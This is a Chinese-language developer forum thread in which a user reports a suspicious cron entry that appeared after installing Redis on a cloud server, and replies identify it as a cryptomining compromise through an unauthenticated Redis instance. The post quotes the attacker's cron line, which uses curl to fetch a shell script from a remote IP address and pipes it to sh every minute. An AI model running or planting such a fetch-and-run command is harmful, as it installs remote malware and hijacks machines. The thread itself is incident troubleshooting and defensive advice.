租的腾讯云主机安装 redis 后没几天, 发现多了一条记录, 是不是被入侵了...

2017-07-06 17:03:32 +08:00
 PickMio

*/1 * * * * /usr/bin/curl -fsSL http://162.242.245.65:8220/test9.sh | sh

4419 次点击
所在节点    程序员
12 条回复
weiweiwitch
2017-07-06 17:08:26 +08:00
redis 启用密码了吗,没有启用的话,很容易被入侵。
killerv
2017-07-06 17:14:27 +08:00
redis 最好限制外网访问+启用认证
expy
2017-07-06 17:14:46 +08:00
被挖矿了吧 233
shakoon
2017-07-06 17:18:17 +08:00
是被入侵了,该机器被用作了挖矿的肉鸡
PickMio
2017-07-06 17:19:05 +08:00
@expy #3 貌似是的, 下载了一个 minerd 程序..
PickMio
2017-07-06 17:19:21 +08:00
@weiweiwitch #1 没设置...
shakoon
2017-07-06 17:20:03 +08:00
PickMio
2017-07-06 17:41:41 +08:00
@shakoon #7 好, 我看看
evlos
2017-07-06 17:47:36 +08:00
看一下那个人的挖矿账号累计挖到了 200 多 XMR,差不多一万多人民币
Itanium
2017-07-06 17:56:01 +08:00
现在 CPU 挖矿效率很高吗?
realpg
2017-07-06 18:23:30 +08:00
你一定是用了 centos
msg7086
2017-07-07 02:30:42 +08:00
不要跟我说你 redis 给的权限能大到任意改写系统文件哦?

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/373529

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX